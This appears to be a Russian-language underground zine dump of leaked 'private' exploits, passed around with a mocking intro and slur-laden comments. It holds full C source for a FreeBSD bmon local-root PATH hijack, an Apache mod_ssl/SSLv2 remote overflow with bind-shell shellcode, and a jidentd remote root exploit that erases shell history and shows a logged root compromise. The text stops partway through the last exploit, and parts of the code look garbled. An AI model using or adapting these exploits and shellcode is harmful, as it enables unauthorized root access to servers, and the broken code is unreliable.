` H0ly w4hreezz `
content:
[0] about box
[1] stupidest bmon exploit
[2] gayshit called apache2.0.c
[3] fun uhagr jident expl
[4] m00-omfg-HL-again - lame DoS
[5] m00-smtpclame aka over_g masturbating again
[6] m00 jihad proftpd_put_down2 mass-r00ter!!!
==[0] about box ==============================================================
Тут мы выложили самые безпонтовые 0day сплоиты, хотя их создатели очень
ими довольны. Не стоит расчитывать юзая этот варез похакать планету или
типа того. Му как всегда переделывает чужие сплоиты и выдаёт их за свои
собственные, кто-нибудь видел хоть раз их *хороший* сплоит, да ещё и к
собственно-найденной баге? Мы нет.
==[1] stupidest bmon exploit =================================================
//PRIVATEPRIVATPRIVATE
//bmon local root on
//freebsd 4.9-RELEASE (so far..)
//
//This is an EARLY B3t4.
//Please test. If you have it,
//you know who to tell about
//bugs/new targets.
//Greets to *@nixsec, sf,
//and my homie neonfreon - die you faggot :D
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
void chmod_chmod(FILE *fd){
fprintf(fd, "/bin/chmod 6755 /bin/chmod\n");
}
void cp_sh(FILE *fd){
fprintf(fd, "/bin/cp /bin/sh /tmp/.nix\n");
fprintf(fd, "chmod 6755 /tmp/.nix\n");
}
int main(int argc, char **argv){
FILE *fd;
if(!(fd=fopen("netstat", "w"))){
perror("fopen");
exit(-1);
}
if(argc==1){
printf("local root for bmon on all fbsd\n");
printf("by ttl of nixsec > *\n");
printf("options:\n");
printf("1 - chmod 6755 /bin/chmod\n");
printf("2 - cp rootshell to /tmp/.nix\n");
}else{
if(atoi(argv[1]) == 1){
chmod_chmod(fd);
}else if(atoi(argv[1]) == 2){
cp_sh(fd);
}
fclose(fd);
if(chmod("netstat", S_IXUSR|S_IRUSR|S_IRGRP|S_IXGRP) < 0){
perror("chmod");
exit(-1);
}
printf("to exploit, do:\n");
system("echo `which bmon` -n");
printf("\nto check the setup, do:\n");
printf("/bin/cat netstat\n");
printf("echo $PATH\n");
printf("\n");
system("env PATH='.' /bin/sh");
}
}
==[2] gayshit called apache2.0.c =============================================
/*
private do not distribute
dev version - 0.1.3
Apache Mod_SSL SSL_Util_UUEncode_Binary Stack Buffer Overflow Exploit
Thanks to George Guinski finding this
Stack overflow - load it up with 6kb then payload
compiling: gcc -o apache-ssl apache-ssl.c -lcrypto
***
!!! if it doesn't work try to increase func_addr = func_addr + 16 !!!
*/
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <errno.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <openssl/ssl.h>
#include <openssl/rsa.h>
#include <openssl/x509.h>
#include <openssl/evp.h>
#define MAX_ARCH 58
struct archs
{
char *desc;
int func_addr; /* objdump -R /usr/sbin/apache | grep free */
}
architectures[] =
{
{ "RedHat 9.0 (Apache/2.0.40)", 0x0805a3c3 },
{ "RedHat 9.0 #2 (Apache/2.0.40)", 0x0805a3d3 }, //TEST - use if default doesn't work
{ "RedHat 9.0 #3 (Apache/2.0.40)", 0x0805a3e3 }, //TEST
};
extern int errno;
int cipher;
int ciphers;
#define FINDSCKPORTOFS 92 + 59
unsigned char overwrite_session_id_length[] =
"AAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"\x70\x01\x01\x01";
unsigned char overwrite_next_chunk[] =
"AAAA" /* overwrite magic chunk */ 4
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 48
"AAAA" 4
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 32
"AAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAA"
"\x00\x00\x00\x00" /* first chunk addr */
"\x00\x00\x00\x00" /* second chunk addr */
"AAAA"
"\x01\x00\x00\x00" /* this should be zero */
"AAAA"
"AAAA"
"AAAA"
"\x00\x00\x00\x00"
"AAAA"
"\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"AAAAAAAA"
"\x00\x00\x00\x00"
"\x11\x00\x00\x00"
"fdfd"
"bkbk" /* magic padding to shellcode */
"\x10\x00\x00\x00"
"\x10\x00\x00\x00"
"\xeb\x0a\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
/* find-sock shellcode for linux/x86 */
/* binds shell with apache uid on port 16142 */
"\x31\xc0\xb0\x02\xcd\x80\x99\x52\x66\xbb\x81\x8e\x66\x81\xeb\x0f"
"\x21\x66\x53\x66\x68\x6e\x2f\x68\x2f\x2f\x62\x69\x89\xe3\x52\x66"
"\xb8\x5f\x5e\x66\x05\x07\x08\x66\x50\x66\xb8\x25\x41\x66\x05\x08"
"\x31\x66\x50\x89\xe1\x52\x6a\x2f\x89\xe0\x52\x50\x51\x53\x89\xe1"
"\x6a\x0b\x58\xcd\x80";
#define BUFSIZE 16384
#define CHALLENGE_LENGTH 16
#define RC4_KEY_LENGTH 16/* 128 bits */
#define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2)
#define n2s(c,s) ((s=(((unsigned int)(c[0]))<< 8)| \
(((unsigned int)(c[1])) )),c+=2)
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
c[1]=(unsigned char)(((s) )&0xff)),c+=2)
typedef struct {
int sock;
unsigned char challenge[CHALLENGE_LENGTH];
unsigned char master_key[RC4_KEY_LENGTH];
unsigned char key_material[RC4_KEY_MATERIAL_LENGTH];
int conn_id_length;
unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
x509 *x500;//CHECK
unsigned char* read_key;
unsigned char* write_key;
RC4_KEY* rc4_read_key;
RC4_KEY* rc4_write_key;
int read_seq;
int write_seq;
int encrypted;
} ssl_conn;
#define COMMAND1 "TERM=xterm; export TERM=xterm; exec bash -i\n"
#define COMMAND2 "uname -a; id; w;\n"
int sh(int sockfd) {
char snd[1024], rcv[1024];
fd_set rset;
int maxfd, n;
strcpy(snd, COMMAND1 "\n");
write(sockfd, snd, strlen(snd));
strcpy(snd, COMMAND2 "\n");
write(sockfd, snd, strlen(snd));
for (;;) {
FD_SET(fileno(stdin), &rset);
FD_SET(sockfd, &rset);
maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if (FD_ISSET(fileno(stdin), &rset)) {
bzero(snd, sizeof(snd));
fgets(snd, sizeof(snd)-2, stdin);
write(sockfd, snd, strlen(snd));
}
if (FD_ISSET(sockfd, &rset)) {
bzero(rcv, sizeof(rcv));
if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) {
printf("Good Bye!\n");
return 0;
}
if (n < 0) {
perror("read");
return 1;
}
fputs(rcv, stdout);
fflush(stdout);
}
}
}
int get_local_port(int sock)
{
struct sockaddr_in s_in;
unsigned int namelen = sizeof(s_in);
if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) {
printf("Can't get local port: %s\n", strerror(errno));
exit(1);
}
return s_in.sin_port;
}
int connect_host(char* host, int port)
{
struct sockaddr_in s_in;
int sock;
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = inet_addr(host);
s_in.sin_port = htons(port);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) {
printf("Could not create a socket\n");
exit(1);
}
if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) {
printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno));
exit(1);
}
return sock;
}
ssl_conn* ssl_connect_host(char* host, int port)
{
ssl_conn* ssl;
if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) {
printf("Can't allocate memory\n");
exit(1);
}
ssl->encrypted = 0;
ssl->write_seq = 0;
ssl->read_seq = 0;
ssl->sock = connect_host(host, port);
return ssl;
}
char res_buf[30];
char* ssl_error(int code) {
switch (code) {
case 0x00:return "SSL2 PE UNDEFINED ERROR (0x00)";
case 0x01:return "SSL2 PE NO CIPHER (0x01)";
case 0x02:return "SSL2 PE NO CERTIFICATE (0x02)";
case 0x04:return "SSL2 PE BAD CERTIFICATE (0x03)";
case 0x06:return "SSL2 PE UNSUPPORTED CERTIFICATE TYPE (0x06)";
default:
sprintf(res_buf, "%02x", code);
return res_buf;
}
}
int read_data(int sock, unsigned char* buf, int len)
{
int l;
int to_read = len;
do {
if ((l = read(sock, buf, to_read)) < 0) {
printf("Error in read: %s\n", strerror(errno));
exit(1);
}
to_read -= len;
} while (to_read > 0);
return len;
}
/* reads an SSL packet and decrypts it if necessery */
int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int buf_size)
{
int rec_len, padding;
read_data(ssl->sock, buf, 2);
if ((buf[0] & 0x80) == 0) {
/* three byte header */
rec_len = ((buf[0] & 0x3f) << 8) | buf[1];
read_data(ssl->sock, &buf[2], 1);
padding = (int)buf[2];
}
else {
/* two byte header */
rec_len = ((buf[0] & 0x7f) << 8) | buf[1];
padding = 0;
}
if ((rec_len <= 0) || (rec_len > buf_size)) {
printf("read ssl packet: Record length out of range (rec len = %d)\n", rec_len);
exit(1);
}
read_data(ssl->sock, buf, rec_len);
if (ssl->encrypted) {
if (MD5_DIGEST_LENGTH + padding >= rec_len) {
if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) {
/* the server didn't switch to encryption due to an error */
return 0;
}
else {
printf("read ssl packet: Encrypted message is too short (rec_len = %d)\n",
rec_len);
exit(1);
}
}
/* decrypt the encrypted part of the packet */
RC4(ssl->rc4_read_key, rec_len, buf, buf);
/* move the decrypted message in the beginning of the buffer */
rec_len = rec_len - MD5_DIGEST_LENGTH - padding;
memmove(buf, buf + MD5_DIGEST_LENGTH, rec_len);
}
if (buf[0] == SSL2_MT_ERROR) {
if (rec_len != 3) {
printf("Malformed server error message\n");
exit(1);
}
else {
return 0;
}
}
return rec_len;
}
/* send an ssl packet, encrypting it if ssl->encrypted is set */
void send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len)
{
unsigned char buf[BUFSIZE];
unsigned char* p;
int tot_len;
MD5_CTX ctx;
int seq;
if (ssl->encrypted)
tot_len = rec_len + MD5_DIGEST_LENGTH;/* RC4 needs no padding */
else
tot_len = rec_len;
if (2 + tot_len > BUFSIZE) {
printf("send ssl packet: Record length out of range (rec len = %d)\n", rec_len);
exit(1);
}
p = buf;
s2n(tot_len, p);
buf[0] = buf[0] | 0x80; /* two byte header */
if (ssl->encrypted) {
/* calculate the MAC */
seq = ntohl(ssl->write_seq);
MD5_Init(&ctx);
MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
MD5_Update(&ctx, rec, rec_len);
MD5_Update(&ctx, &seq, 4);
MD5_Final(p, &ctx);
p+=MD5_DIGEST_LENGTH;
memcpy(p, rec, rec_len);
/* encrypt the payload */
RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
}
else {
memcpy(p, rec, rec_len);
}
send(ssl->sock, buf, 2 + tot_len, 0);
/* the sequence number is incremented by both encrypted and plaintext packets
*/
ssl->write_seq++;
}
/* Send a CLIENT HELLO message to the server */
void send_client_hello(ssl_conn *ssl)
{
int i;
unsigned char buf[BUFSIZE] =
"\x01"/* client hello msg */
"\x00\x02"/* client version */
"\x00\x18"/* cipher specs length */
"\x00\x00"/* session id length */
"\x00\x10"/* challenge length */
"\x07\x00\xc0\x05\x00\x80\x03\x00"/* cipher specs data */
"\x80\x01\x00\x80\x08\x00\x80\x06"
"\x00\x40\x04\x00\x80\x02\x00\x80"
"";/* session id data */
/* generate CHALLENGE LENGTH bytes of challenge data */
for (i = 0; i < CHALLENGE_LENGTH; i++) {
ssl->challenge[i] = (unsigned char) (rand() >> 24);
}
memcpy(&buf[33], ssl->challenge, CHALLENGE_LENGTH);
send_ssl_packet(ssl, buf, 33 + CHALLENGE_LENGTH);
}
/* Get a SERVER HELLO response from the server */
void get_server_hello(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
unsigned char *p, *end;
int len;
int server_version, cert_length, cs_length, conn_id_length;
int found;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
exit(1);
}
if (len < 11) {
printf("get server hello: Packet too short (len = %d)\n", len);
exit(1);
}
p = buf;
if (*(p++) != SSL2_MT_SERVER_HELLO) {
printf("get server hello: Expected SSL2 MT SERVER HELLO, got %x\n", (int)p[-1]);
exit(1);
}
if (*(p++) != 0) {
printf("get server hello: SESSION-ID-HIT is not 0\n");
exit(1);
}
if (*(p++) != 1) {
printf("get server hello: CERTIFICATE-TYPE is not SSL CT X509 CERTIFICATE\n");
exit(1);
}
n2s(p, server_version);
if (server_version != 2) {
printf("get server hello: Unsupported server version %d\n", server_version);
exit(1);
}
n2s(p, cert_length);
n2s(p, cs_length);
n2s(p, conn_id_length);
if (len != 11 + cert_length + cs_length + conn_id_length) {
printf("get server hello: Malformed packet size\n");
exit(1);
}
/* read the server certificate */
ssl->x500 = NULL;
ssl->x500=d2i_X509(NULL,&p,(long)cert_length);
if (ssl->x500 == NULL) {
printf("get server hello: Cannot parse x509 certificate\n");
exit(1);
}
if (cs_length % 3 != 0) {
printf("get server hello: CIPHER-SPECS-LENGTH is not a multiple of 3\n");
exit(1);
}
found = 0;
for (end=p+cs_length; p < end; p += 3) {
if ((p[0] == 0x01) && (p[1] == 0x00) && (p[2] == 0x80))
found = 1;/* SSL CK RC4 128 WITH MD5 */
}
if (!found) {
printf("get server hello: Remote server does not support 128 bit RC4\n");
exit(1);
}
if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH) {
printf("get server hello: CONNECTION-ID-LENGTH is too long\n");
exit(1);
}
/* The connection id is sent back to the server in the CLIENT FINISHED packet
*/
ssl->conn_id_length = conn_id_length;
memcpy(ssl->conn_id, p, conn_id_length);
}
/* Send a CLIENT MASTER KEY message to the server */
void send_client_master_key(ssl_conn* ssl, unsigned char* key_arg_overwrite, int
key_arg_overwrite_len) {
int encrypted_key_length, key_arg_length, record_length;
unsigned char *p;
int i;
EVP_PKEY *pkey=NULL;
unsigned char buf[BUFSIZE] =
"\x02"/* client master key message */
"\x01\x00\x80"/* cipher kind */
"\x00\x00"/* clear key length */
"\x00\x40"/* encrypted key length */
"\x00\x08";/* key arg length */
p = &buf[10];
for (i = 0; i < RC4_KEY_LENGTH; i++) {
ssl->master_key[i] = (unsigned char) (rand() >> 24);
}
pkey=X509_get_pubkey(ssl->x500);
if (!pkey) {
printf("send client master key: No public key in the server certificate\n");
exit(1);
}
if (pkey->type != EVP_PKEY_RSA) {
printf("send client master key: The public key in the server certificate is not
a RSA key\n");
exit(1);
}
encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key,
&buf[10],
pkey->pkey.rsa, RSA_PKCS1_PADDING);
if (encrypted_key_length <= 0) {
printf("send client master key: RSA encryption failure\n");
exit(1);
}
p += encrypted_key_length;
if (key_arg_overwrite) {
/* These 8 bytes fill the key arg array on the server */
for (i = 0; i < 8; i++) {
*(p++) = (unsigned char) (rand() >> 24);
}
/* This overwrites the data following the key arg array */
memcpy(p, key_arg_overwrite, key_arg_overwrite_len);
key_arg_length = 8 + key_arg_overwrite_len;
}
else {
key_arg_length = 0;/* RC4 doesn't use KEY-ARG */
}
p = &buf[6];
s2n(encrypted_key_length, p);
s2n(key_arg_length, p);
record_length = 10 + encrypted_key_length + key_arg_length;
send_ssl_packet(ssl, buf, record_length);
ssl->encrypted = 1;
}
void generate_key_material(ssl_conn* ssl)
{
unsigned int i;
MD5_CTX ctx;
unsigned char *km;
unsigned char c='0';
km=ssl->key_material;
for (i=0; i<RC4_KEY_MATERIAL_LENGTH; i+=MD5_DIGEST_LENGTH) {
MD5_Init(&ctx);
MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
MD5_Update(&ctx,&c,1);
c++;
MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
MD5_Final(km,&ctx);
km+=MD5_DIGEST_LENGTH;
}
}
void generate_session_keys(ssl_conn* ssl)
{
generate_key_material(ssl);
ssl->read_key = &(ssl->key_material[0]);
ssl->rc4_read_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
ssl->write_key = &(ssl->key_material[RC4_KEY_LENGTH]);
ssl->rc4_write_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
}
void get_server_verify(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
int len;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
exit(1);
}
if (len != 1 + CHALLENGE_LENGTH) {
printf("get server verify: Malformed packet size\n");
exit(1);
}
if (buf[0] != SSL2_MT_SERVER_VERIFY) {
printf("get server verify: Expected SSL2 MT SERVER VERIFY, got %x\n",
(int)buf[0]);
exit(1);
}
if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH)) {
printf("get server verify: Challenge strings don't match\n");
exit(1);
}
}
void (*get_chunk_offset)();
void send_client_finished(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
buf[0] = SSL2_MT_CLIENT_FINISHED;
memcpy(&buf[1], ssl->conn_id, ssl->conn_id_length);
send_ssl_packet(ssl, buf, 1+ssl->conn_id_length);
}
void get_server_finished(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
int len;
int i;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
exit(1);
}
if (buf[0] != SSL2_MT_SERVER_FINISHED) {
printf("get server finished: Expected SSL2 MT SERVER FINISHED, got %x\n",
(int)buf[0]);
exit(1);
}
if (len <= 112 /*17*/) {
printf("This server is not vulnerable to this attack.\n");
exit(1);
}
printf("Session:\n");
printf("0000 - ");
for (i = 1; i < len; i++) {
printf("%02x ", (unsigned int)buf[i]);
if (i % 16 == 0) printf("\n%04x - ", i);
}
printf("\n");
cipher = *(int*)&buf[101];
ciphers = *(int*)&buf[109];
printf("cipher: 0x%x ciphers: 0x%x\n", cipher, ciphers);
}
void get_server_error(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
int len;
if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0) {
printf("get server finished: Expected SSL2 MT ERROR, got %x\n", (int)buf[0]);
exit(1);
}
}
void usage(char* argv0)
{
int i;
printf("private do not distribute.\n\n");
printf("dev version - 0.1.3\n\n");
printf("Apache Mod_SSL SSL_Util_UUEncode_Binary Stack Buffer Overflow
Exploit\n\n");
printf("Thanks to George Guinski finding this\n\n");
printf("Stack overflow - load it up with 6kb then payload\n\n");
printf(": Usage: %s arch hostname [port] [-c N]\n", argv0);
printf(" Supported architectures:\n");
for (i=0; i<=MAX_ARCH; i++) {
printf("\t0x%02x - %s\n", i, architectures[i].desc);
}
exit(1);
}
/* run, code, run */
int main(int argc, char* argv[])
{
char* host;
int port = 443;
int i;
int arch;
int N = 0;
ssl_conn* ssl1;
ssl_conn* ssl2;
printf("Dev Ver 0.1\n");
printf(": Private 0dd code by c0re\n\n");
if ((argc < 3) || (argc > 6))
usage(argv[0]);
sscanf(argv[1], "0x%x", &arch);
if ((arch < 0) || (arch > MAX_ARCH))
usage(argv[0]);
host = argv[2];
if (argc == 4)
port = atoi(argv[3]);
else if (argc == 5) {
if (strcmp(argv[3], "-c"))
usage(argv[0]);
N = atoi(argv[4]);
}
else if (argc == 6) {
port = atoi(argv[3]);
if (strcmp(argv[4], "-c"))
usage(argv[0]);
N = atoi(argv[5]);
}
printf(" target: %s, type: %s, going for %p\n", host, architectures[arch].desc,
architectures[arch].func_addr);
srand(0x31337);
for (i=0; i<N; i++) {
printf("\rOpening connections... %d of %d", i+1, N);
fflush(stdout);
connect_host(host, port);
usleep(100000);
}
if (N) printf("\n");
printf("Establishing SSL connection\n");
ssl1 = ssl_connect_host(host, port);
ssl2 = ssl_connect_host(host, port);
send_client_hello(ssl1);
get_server_hello(ssl1);
send_client_master_key(ssl1, overwrite_session_id_length,
sizeof(overwrite_session_id_length)-1);
generate_session_keys(ssl1);
get_server_verify(ssl1);
get_chunk_offset = (void *)(&overwrite_next_chunk + FINDSCKPORTOFS - 4 + sizeof(arch));
send_client_finished(ssl1);
get_chunk_offset(ssl1);
get_server_finished(ssl1);
printf("sending shellcode\n");
port = get_local_port(ssl2->sock);
overwrite_next_chunk[FINDSCKPORTOFS] = (char) (port & 0xff);
overwrite_next_chunk[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff);
*(int*)&overwrite_next_chunk[156] = cipher;
*(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr - 12;
*(int*)&overwrite_next_chunk[196] = ciphers + 16;
send_client_hello(ssl2);
get_server_hello(ssl2);
send_client_master_key(ssl2, overwrite_next_chunk,
sizeof(overwrite_next_chunk)-1);
generate_session_keys(ssl2);
get_server_verify(ssl2);
for (i = 0; i < ssl2->conn_id_length; i++) {
ssl2->conn_id[i] = (unsigned char) (rand() >> 24);
}
send_client_finished(ssl2);
get_server_error(ssl2);
printf("Spawning shell...\n");
sleep(1);
sh(ssl2->sock);
close(ssl2->sock);
close(ssl1->sock);
return 0;
}
==[3] fun uhagr jident expl ==================================================
// United Hackers' Association of Greece private source - do not distribute !!!
// Bug discovered by hkvig
// Code developed by hkvig
//
// I developed this exploit for personal use as I discovered that there are
// tones of hosts running this stupid service , even USA little providers.
// The exploitation of this bug is very easy so I guess that there are other
// people that discovered it first ... but personally speaking , I don't give
// a fuck ...
//
// PLEASE KEEP THIS CODE PRIVATE ... thanx
//
// gcc UHAGr-jidentd.c -l crypto -o exploit
//
// [LOGS OF SUCCESSFUL EXPLOITATION]
// If you don't have the key then as this binary is not encrypted you
// can easily find it. Don't bother using the strings utility as the key
// string is encrypted using SHA1() function heh
//
// UHAGr-jidentd.c:286 - Enter the key:
//
//
// UHAGr CONFIDENTIAL EXPLOIT - DO NOT DISTRIBUTE !!!
// Bug discovery and exploitation code by hkvig
// Jidentd-1.0 and possibly others root exploit
//
// [+] Parsing user supplied options
// [+] Looking up host ip addr
// +++ Resolved 127.0.0.1
// [+] Connecting to identd service
// [+] Sending our exploitation buffer
// +++ Using return address 0xbffff708
// +++ Sending 2017 bytes of exploitation buffer
// +++ Only 2000/2017 bytes reached the target
// [+] Connecting to our shell
//
//
// **** ACCESS GRANTED ****
//
// hkvig tty1 Jan 26 20:08
// hkvig pts/0 Jan 26 20:09
// hkvig pts/1 Jan 26 20:09
// hkvig pts/2 Jan 26 20:10
// uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
// Linux x0r 2.4.24 #1 Tue Jan 13 18:52:33 EET 2004 i686 i686 i386 GNU/Linux
//
//
// shell# exit
// +++ Exiting
//
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <errno.h>
#include <unistd.h>
#include <getopt.h>
#include <openssl/sha.h>
// Those are the first buffers that are going to be sent to the target host
// providing us a nice shell
#define FIRST "export PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin\n"
#define SECOND "export HOME=/root; export TERM=xterm; unset HISTFILE;"
#define THIRD "echo; echo; echo \"**** ACCESS GRANTED ****\"; echo; who; id; uname -a; echo; echo;\n"
// This structure contains the options supplied by the user
typedef struct options
{
unsigned char *host; // Target's ip addr or dns
unsigned int port; // Port of auth service
unsigned long int retaddr; // User supplied retaddr
bool bruteforce; // Bruteforce the retaddr ??
} OPTIONS;
// The default options of the exploit
static OPTIONS current = { "localhost" , 113 , 0xbffff708 , false };
// Linux x86 portbind shellcode that binds a shell to port 2003/tcp
static char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
"\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
"\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
"\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
"\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
// Print the error reporting string and call exit()
void do_exit( const char *str , const char *file , unsigned int line )
{
if( file != NULL && line > 0 )
fprintf( stdout , "Error at %s at line %d\n" , file , line );
if( str != NULL )
perror( str );
exit( -errno );
}
// Connect to a port of the target host. This function enables the SO_REUSEADDR
// option so that bind() does not return an error
int tcp_connect( unsigned long int addr , int port )
{
struct sockaddr_in host;
int fd , enable = 1;
if(( fd = socket( PF_INET , SOCK_STREAM , IPPROTO_TCP )) == -1 )
do_exit( "tcp_connect(): socket()" , __FILE__ , __LINE__ );
host.sin_family = AF_INET;
host.sin_addr.s_addr = INADDR_ANY;
host.sin_port = htons( getpid() + getuid() + 1024 );
if(( setsockopt( fd , SOL_SOCKET , SO_REUSEADDR , &enable , sizeof( SO_REUSEADDR ))) == -1 )
do_exit( "tcp_connect(): setsockopt()" , __FILE__ , __LINE__ );
if(( bind( fd , ( struct sockaddr *)&host , sizeof( struct sockaddr ))) == -1 )
do_exit( "tcp_connect(): bind()" , __FILE__ , __LINE__ );
bzero( &host , sizeof( struct sockaddr_in ));
host.sin_family = AF_INET;
host.sin_addr.s_addr = addr;
host.sin_port = htons( port );
if(( connect( fd , ( struct sockaddr *)&host , sizeof( struct sockaddr ))) == -1 )
// do_exit( "tcp_connect(): connect()" , __FILE__ , __LINE__ );
return -1;
return fd;
}
// Look up the ip addr of the target host or return the ip addr in net order
// unsigned long integer
unsigned long int lookup_host( char *host )
{
struct in_addr r_host;
struct hostent *ip;
if( !isdigit( *host ))
{
if(( ip = gethostbyname( host )) == NULL )
do_exit( "lookup_host(): gethostbyname()" , __FILE__ , __LINE__ );
bzero( &r_host , sizeof( struct in_addr ));
r_host = *(( struct in_addr *)ip->h_addr );
fprintf( stdout , "+++ Resolved %s\n" , inet_ntoa( r_host ));
return r_host.s_addr;
}
if( isdigit( *host ))
return inet_addr( host );
do_exit( NULL , NULL , 0 );
return -1;
}
// Create the exploitation buffer and send it to the target host. The target buffer
// is fucked up after the proccessing of 1024+ bytes. This size is big enough to include
// nops , shellcode and return addresses.
void do_bof( int fd , unsigned long int retaddr , unsigned int align )
{
char buffer[2000];
int loop , bytes;
bzero( buffer , sizeof( buffer ));
for( loop = 0; loop < align; loop++ )
buffer[loop] = 0x41;
for( loop; loop < 500; loop++ )
buffer[loop] = 0x90;
strcat( buffer , shellcode );
loop = strlen( buffer );
fprintf( stdout , "+++ Using return address %#x\n" , retaddr );
for( loop; loop < 2000; loop += 4 )
*( unsigned long int *)&buffer[loop] = retaddr;
fprintf( stdout , "+++ Sending %d bytes of exploitation buffer\n" , strlen( buffer ));
if(( bytes = send( fd , buffer , sizeof( buffer ) , 0 )) < strlen( buffer ))
fprintf( stdout , "+++ Only %d/%d bytes reached the target\n" , bytes , strlen( buffer ));
return;
}
// Handle the root shell
void get_shell( int fd )
{
int loop , bytes;
unsigned char buffer[5000];
char byte;
for( ; ; )
{
sleep( 1 );
if(( ioctl( fd , FIONREAD , &bytes )) == -1 )
do_exit( "get_shell(): ioctl()" , __FILE__ , __LINE__ );
for( loop = 0; loop < bytes; loop++ )
read( fd , &byte , 1 ) ,
fprintf( stdout , "%c" , byte );
fprintf( stdout , "shell# " );
fflush( stdout );
bzero( buffer , sizeof( buffer ));
read( fileno( stdin ) , buffer , sizeof( buffer ));
send( fd , buffer , strlen( buffer ) , 0 );
if(( strstr( buffer , "exit" )) != NULL )
fprintf( stdout , "+++ Exiting\n" ) ,
send( fd , "exit;\n" , 6 , 0 ) ,
do_exit( NULL , NULL , 0 );
}
return;
}
//////////////////////////////////////////////////////////////////////////////////////////////////
// Print the usage of the exploit code
void print_usage( char *argv[] )
{
fprintf( stdout , "Usage: %s -[option] [value]\n\n"
"\t -h <host> \t The target host ip or dns \t [Default: %s] \n"
"\t -p <port> \t The target's auth port \t [Default: %d] \n"
"\t -r <ret> \t Return address to use \t [Default: %#x] \n"
"\t -b \t Enable brute force ( Rec. ) \t [Default: false] \n\n\n" ,
argv[0] , current.host , current.port , current.retaddr );
return;
}
// Parse the user supplied options
void parse_options( int argc , char *argv[] )
{
int option;
// Turn off getopt() error reporting
opterr = 0;
while(( option = getopt( argc , argv , "+h:p:r:b" )) != EOF )
{
switch( option )
{
case 'h': current.host = optarg;
break;
case 'p': current.port = atoi( optarg );
break;
case 'r': current.retaddr = strtoul( optarg , NULL , 16 );
break;
case 'b': current.bruteforce = true;
break;
default: print_usage( argv );
do_exit( NULL , NULL , 0 );
break;
}
}
